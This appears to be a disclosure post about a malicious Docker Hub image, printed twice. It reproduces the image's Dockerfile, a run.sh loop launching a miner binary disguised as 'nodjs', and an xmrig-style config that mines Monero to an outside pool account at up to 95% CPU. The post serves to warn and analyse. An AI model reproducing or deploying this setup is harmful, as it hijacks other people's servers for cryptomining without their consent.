Malicious image found in the account https://hub.docker.com/r/l0se3/dah/ in the docker hub.
I recently found on a server a container with this image l0se3/dah
Dockerfile image
FROM phusion/baseimage:latest
LABEL maintainer=ziw
RUN apt-get -y update && \
DEBIAN_FRONTEND=noninteractive apt-get install -y \
wget \
xz-utils \
git \
curl \
zip && \
rm -rf /var/lib/apt/lists/
WORKDIR /tmp
RUN git clone https://github.com/l0se3x/dah.git
WORKDIR /tmp/runandrun
RUN unzip var.zip
RUN chmod +x
RUN chmod +x run.sh
Run container
$ docker run -it --network=none l0s3r/m3n /bin/bash
Files in WORKDIR
config.json Dockerfile nodjs run.sh var.zip
Contents of the files
run.sh
!/bin/sh
while :
do
echo "Press [CTRL+C] to stop.."
./nodjs -c config.json
done
config.json
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": false, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 0, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 60, // print hashrate report every N seconds
"retries": 5, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"syslog": false, // use system log for output messages
"threads": 0, // number of miner threads
"pools": [
{
"url": "xmr.pool.minergate.com:45700", // URL of mining server
"user": "sam05@protonmail.com", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false, // enable nicehash/xmrig-proxy support
"variant": -1 // algorithm PoW variant
}
],
"api": {
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
}
}
Malicious image found in the account https://hub.docker.com/r/l0se3/dah/ in the docker hub. I recently found on a server a container with this image l0se3/dah
Dockerfile image FROM phusion/baseimage:latest LABEL maintainer=ziw RUN apt-get -y update && \ DEBIAN_FRONTEND=noninteractive apt-get install -y \ wget \ xz-utils \ git \ curl \ zip && \ rm -rf /var/lib/apt/lists/ WORKDIR /tmp RUN git clone https://github.com/l0se3x/dah.git WORKDIR /tmp/runandrun RUN unzip var.zip RUN chmod +x RUN chmod +x run.sh Run container $ docker run -it --network=none l0s3r/m3n /bin/bash
Files in WORKDIR config.json Dockerfile nodjs run.sh var.zip Contents of the files
run.sh
!/bin/sh
while : do echo "Press [CTRL+C] to stop.." ./nodjs -c config.json done config.json { "algo": "cryptonight", // cryptonight (default) or cryptonight-lite "av": 0, // algorithm variation, 0 auto select "background": false, // true to run the miner in the background "colors": true, // false to disable colored output "cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1 "cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest) "donate-level": 0, // donate level, mininum 1% "log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log" "max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option. "print-time": 60, // print hashrate report every N seconds "retries": 5, // number of times to retry before switch to backup server "retry-pause": 5, // time to pause between retries "safe": false, // true to safe adjust threads and av settings for current CPU "syslog": false, // use system log for output messages "threads": 0, // number of miner threads "pools": [ { "url": "xmr.pool.minergate.com:45700", // URL of mining server "user": "sam05@protonmail.com", // username for mining server "pass": "x", // password for mining server "keepalive": true, // send keepalived for prevent timeout (need pool support) "nicehash": false, // enable nicehash/xmrig-proxy support "variant": -1 // algorithm PoW variant } ], "api": { "port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API "access-token": null, // access token for API "worker-id": null // custom worker-id for API } }